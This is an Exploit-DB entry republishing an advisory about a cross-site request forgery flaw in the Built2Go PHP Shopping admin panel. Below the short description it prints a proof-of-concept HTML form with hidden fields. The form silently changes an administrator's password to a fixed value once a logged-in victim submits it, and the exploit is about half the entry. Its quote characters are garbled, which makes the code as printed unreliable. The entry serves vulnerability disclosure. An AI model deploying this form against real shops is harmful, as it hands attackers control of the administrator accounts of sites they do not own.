Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)

EDB-ID:

39013

CVE:

N/A




Platform:

PHP

Date:

2014-01-08


source: https://www.securityfocus.com/bid/64735/info

Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers. 

<form method=�POST� name=�form0? action=� http://www.example.com/adminpanel/edit_admin.php�>
<input type=�hidden� name=�userid� value=�ADMIN�/>
<input type=�hidden� name=�pass� value=�12121212?/>
<input type=�hidden� name=�retypepass� value=�12121212?/>
<input type=�hidden� name=�addnew� value=�1?/>
<input type=�hidden� name=�action� value=�save�/>
<input type=�hidden� name=�new� value=�Submit�/>
</form>